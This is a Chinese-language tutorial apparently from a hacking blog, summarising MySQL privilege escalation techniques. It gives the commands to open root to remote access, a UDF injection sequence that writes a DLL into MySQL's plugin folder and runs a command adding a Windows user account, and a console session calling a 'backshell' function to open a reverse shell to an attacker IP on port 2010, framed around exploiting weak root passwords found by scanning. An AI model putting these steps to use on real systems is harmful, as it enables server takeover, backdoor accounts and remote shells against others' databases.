Mysql提权总结
mysql默认状态下是不开放对外访问功能的
1、如何设置才能允许外网访问MySQL
使用“mysql -uroot -proot”命令可以连接到本地的mysql服务;
使用“use mysql”命令,选择要使用的数据库,修改远程连接的基本信息,保存在mysql数据库中,因此使用mysql数据库;
使用“GRANT ALL PRIVILEGES ON *.* TO 'root'@'%' IDENTIFIED BY 'root' WITH GRANT OPTION;”命令可以更改远程连接的设置;
使用“flush privileges;”命令刷新刚才修改的权限,使其生效;
使用“select host,user from user;”查看修改是否成功
2、phpmyadmin 连入提权
select @@basedir; //Mysql安装目录 C:/phpStudy/MySQL/ CREATE TABLE udftest(udf BLOB); INSERT into udftest values (CONVERT(,CHAR));CONVERT(这里换成你的UDF的HEX编码,CHAR)); SELECT udf FROM udftest INTO DUMPFILE 'C:\\phpStudy\\MySQL\\lib\\plugin\\udf.dll';-- select 'It is dll' into dumpfile 'C:\\phpStudy\\MySQL\\lib\\plugin::$INDEX_ALLOCATION'; DROP TABLE udftest; create function cmdshell returns string soname 'udf.dll' select cmdshell('net user xiaozi xiaozi /add');
参考链接: phpmyadmin直接提权 http://www.hack80.com/forum.php?mod=viewthread&tid=1304
通过phpmyadmin各种技巧拿webshell https://www.exehack.net/99.html
3、mysql弱口令(反弹端口连接提权)
假如我们扫到了一个mysql的root弱密码,并且可以外连,但是服务器上面的网站又无法Getshell,这时我们怎么办呢?
1、利用mysql客户端工具连接mysql服务器,然后执行下面的操作。
实验环境:phpStudy 默认安装的mysql数据库 5.5.40版本
C:\APMServ5\APMServ5.2.6\MySQL5.1\bin>mysql.exe -h 192.168.106.141 -u root -p Enter password: **** Welcome to the MySQL monitor. Commands end with ; or \g. Your MySQL connection id is 11 Server version: 5.5.40 MySQL Community Server (GPL) Type 'help;' or '\h' for help. Type '\c' to clear the buffer. mysql> \. c:\mysql.txt Database changed Query OK, 0 rows affected (0.02 sec) Query OK, 0 rows affected (0.06 sec) Query OK, 1 row affected (0.01 sec) Query OK, 1 row affected (0.00 sec) Rows matched: 1 Changed: 1 Warnings: 0 Query OK, 1 row affected (0.00 sec) Query OK, 0 rows affected (0.09 sec) +-------------------------------------------------------+ | backshell('') | +-------------------------------------------------------+ | 反弹shell. 例:select backshell("your IP",your port); | +-------------------------------------------------------+ 1 row in set (0.00 sec) mysql> select backshell("192.168.106.137",2010); +-----------------------------------+ | backshell("192.168.106.137",2010) | +-----------------------------------+ | 执行成功 | +-----------------------------------+ 1 row in set (0.02 sec) mysql> select backshell("192.168.106.137",2010); +-----------------------------------------+ | backshell("192.168.106.137",2010) | +-----------------------------------------+ | 创建临时文件出错,backshell无法继续运行. | +-----------------------------------------+ 1 row in set (0.02 sec) mysql> select @@version -> ; +-----------+ | @@version | +-----------+ | 5.5.40 | +-----------+ 1 row in set (0.00 sec) mysql>
mysql.txt:
复制以上内容保存为mysql.txt即可。
参考文章:
mysql利用ntfs的ADS创建文件夹 http://blog.csdn.net/yiyefangzhou24/article/details/17190135
MYSQL提权总结 http://www.waitalone.cn/mysql-tiquan-summary.html?replytocom=390